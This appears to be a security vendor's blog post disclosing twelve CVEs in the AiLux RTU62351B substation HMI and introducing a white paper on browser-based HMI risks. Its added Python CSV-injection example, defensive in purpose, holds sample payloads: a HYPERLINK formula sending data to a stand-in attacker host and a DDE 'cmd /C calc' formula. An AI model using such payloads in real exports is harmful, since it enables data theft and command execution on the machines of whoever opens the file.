Nozomi Networks Labs Announces Vulnerabilities Affecting the AiLux RTU62351B and the “Codename I11USION” Whitepaper

In Q4 2023, Nozomi Networks Labs took part in the No Hat security conference in Bergamo, Italy, presenting the results of new research on browser-based human-machine interfaces (HMIs), titled “Codename I11USION”.

The research spotlights the top eleven risks that come with adopting a web-centric, browser-based HMI approach, and the consequences those risks have for the OT environments such HMIs control.

This blog post marks the completion of our CVE reservation process, which allows us to publish the vulnerabilities in the AiLux RTU62351B, the last device in our series. With this final step concluded, we are also releasing the white paper associated with the research, which describes all results and insights from our investigation in full.

In this blog, we detail the vulnerabilities found in the RTU62351B and share a brief outline of what to expect in the related white paper.

An HMI being used inside an industrial control system.

Twelve Vulnerabilities Affect the AiLux RTU62351B

In the past few years, Nozomi Networks Labs has conducted extensive research on the security of browser-based HMIs, analyzing devices from high-profile vendors such as Siemens, SEL, Phoenix Contact, and Bosch Rexroth.

AiLux is an emerging Italian brand in substation automation systems, producing devices that are deployed in plants of major energy players such as Enel and Eni. Among them is the RTU62351B, a Remote Terminal Unit (RTU) with an embedded HMI designed for the automation and control of electrical substations. The device runs a customized, Linux-based operating system that exposes a web-based HMI. Physical operators monitor and interact with it through the touch panel and a Chromium-based browser running on the device itself; remote control and monitoring over the Ethernet network are also available.

The AiLux RTU62351B, with embedded HMI.

While analyzing the device, Nozomi Networks Labs discovered twelve vulnerabilities, listed below:

| CVE ID | CWE | CVSS v3.1 Base Score | CVSS v3.1 Vector |
|---|---|---|---|
| CVE-2023-5456 | Use of Hard-coded Credentials (CWE-798) | 8.1 | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVE-2023-5457 | Product Released in Non-Release Configuration (CWE-1269) | 7.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVE-2023-45591 | Heap-based Buffer Overflow (CWE-122) | 7.5 | CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CVE-2023-45592 | Execution with Unnecessary Privileges (CWE-250) | 6.8 | CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVE-2023-45593 | Protection Mechanism Failure (CWE-693) | 6.8 | CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVE-2023-45594 | Files or Directories Accessible to External Parties (CWE-552) | 6.8 | CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVE-2023-45595 | Unrestricted Upload of File with Dangerous Type (CWE-434) | 5.9 | CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L |
| CVE-2023-45596 | Missing Authorization (CWE-862) | 5.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| CVE-2023-45597 | Improper Neutralization of Formula Elements in a CSV File (CWE-1236) | 5.9 | CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L |
| CVE-2023-45598 | Missing Authorization (CWE-862) | 5.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| CVE-2023-45599 | Reliance on File Name or Extension of Externally-Supplied File (CWE-646) | 5.5 | CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L |
| CVE-2023-45600 | Insufficient Session Expiration (CWE-613) | 5.6 | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L |
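One entry in the table, CWE-1236 (CVE-2023-45597), is a weakness class that is easy to overlook in an HMI because the device itself is never the victim: when an HMI exports event or tag data to CSV and writes operator-supplied text verbatim, a cell beginning with a formula character is evaluated by the spreadsheet an engineer later opens the export with. The Python below is an added example written for this post; it is not code from the Nozomi Networks Labs research, the white paper, or the AiLux firmware, and the sample event log, tag names and payload strings are constructed for illustration. It shows the vulnerable export pattern next to a hardened writer (neutralize_cell) and a check (find_formula_cells) you can run over an export you already have.

```python
import csv
import io

# Leading characters that make common spreadsheet applications evaluate a cell
# as a formula (or a DDE expression) when a CSV is opened. The list follows the
# OWASP CSV injection guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _is_numeric(text):
    """True for plain numbers such as '-12.5'. A spreadsheet treats those as
    values, not formulas, so they must neither be escaped nor flagged."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def neutralize_cell(value):
    """Return a cell that a spreadsheet will display as literal text.

    Numbers pass through untouched. A string whose first non-space character
    is a formula trigger gets a leading single quote, which spreadsheets read
    as 'treat this cell as text'. Quoting of the CSV field itself (embedded
    commas and double quotes) is left to the csv module.
    """
    if isinstance(value, (int, float)):
        return str(value)
    text = str(value)
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS) and not _is_numeric(text):
        return "'" + text
    return text


def export_csv(rows, header, hardened=True):
    """Render an event export. hardened=False reproduces the vulnerable
    pattern: free text typed into the HMI is written into the file as-is."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(c) if hardened else c for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Detection check for an export you did not produce yourself: return
    (row, column, content) for every cell a spreadsheet would evaluate."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.lstrip(" ").startswith(FORMULA_TRIGGERS) and not _is_numeric(cell):
                hits.append((r, c, cell))
    return hits


# Constructed sample: an HMI event log whose last column is free text entered
# by an operator (or by whoever controls the operator's browser session).
SAMPLE_HEADER = ("timestamp", "tag", "value", "operator_note")
SAMPLE_ROWS = [
    ("2023-11-02T09:14:00Z", "BRK_21_STATE", 1, "closed after maintenance"),
    ("2023-11-02T09:20:31Z", "LINE_3_MW", -12.5, "reverse flow expected"),
    ("2023-11-02T09:25:07Z", "BRK_21_STATE", 0,
     '=HYPERLINK("http://attacker.invalid/?"&A1,"open report")'),
    ("2023-11-02T09:31:44Z", "OPER_NOTE", "", "@SUM(1+9)*cmd|' /C calc'!A0"),
]

if __name__ == "__main__":
    vulnerable = export_csv(SAMPLE_ROWS, SAMPLE_HEADER, hardened=False)
    hardened = export_csv(SAMPLE_ROWS, SAMPLE_HEADER)
    print("cells flagged in vulnerable export:", find_formula_cells(vulnerable))
    print("cells flagged in hardened export:  ", find_formula_cells(hardened))
```

Two design points worth noting. The check skips anything that parses as a number, so a legitimate negative measurement such as -12.5 MW is neither escaped nor reported, which keeps the export usable for the engineers who rely on it. And the single-quote prefix is a presentation choice: it is what most spreadsheet applications understand as "text", but it is visible in some viewers, so a vendor may prefer to reject formula-leading input at the HMI form instead of rewriting it at export time. Either way, the fix belongs on the device; telling every recipient to open exports carefully does not scale.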

The impacts of these vulnerabilities vary, but one chain stands out: by exploiting weaknesses in the configuration of the on-device browser, an unauthenticated attacker with physical access to the touch panel could have read sensitive resources on the device, altered its configuration, and ultimately executed arbitrary commands as root. The white paper walks through this chain step by step and explains how each of the vulnerabilities involved could have been abused.

All twelve CVEs have been remediated in the AiLux imx6 bundle version imx6_1.0.7-2. We strongly recommend that asset owners apply this update to prevent the device from being misused by threat actors.

Codename I11USION: the White Paper

The newly released white paper from Nozomi Networks Labs provides an in-depth overview of our research into the changing landscape of HMIs. As these interfaces adopt web technologies more extensively, the move to browser-based HMIs brings considerable advantages to operational technology sectors. The same shift, however, introduces security risks that vendors often overlook.

Nozomi Networks Labs examined five browser-based HMIs from leading vendors to identify and describe eleven major security risks inherent to these systems. They range from well-known web security issues such as Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) to less obvious ones, such as mishandled file operations and the remote exploitation of privileges that are granted to physical operators. Each of them gives an attacker a potential path to full control over the HMI and, through it, over the industrial processes it controls.

Exploitation of CVE-2023-45594 and CVE-2023-45593, one of the chains covered in the white paper.

Through several case studies, the white paper demonstrates how these vulnerabilities can be exploited to disrupt operations and to manipulate what the HMI displays, hiding malicious activity from the operators watching it. These scenarios illustrate the threat such weaknesses pose to both physical safety and operational integrity.

The paper concludes with practical measures that end users, vendors, and the broader community can adopt to mitigate the risks of browser-based HMIs and raise the overall security of industrial environments.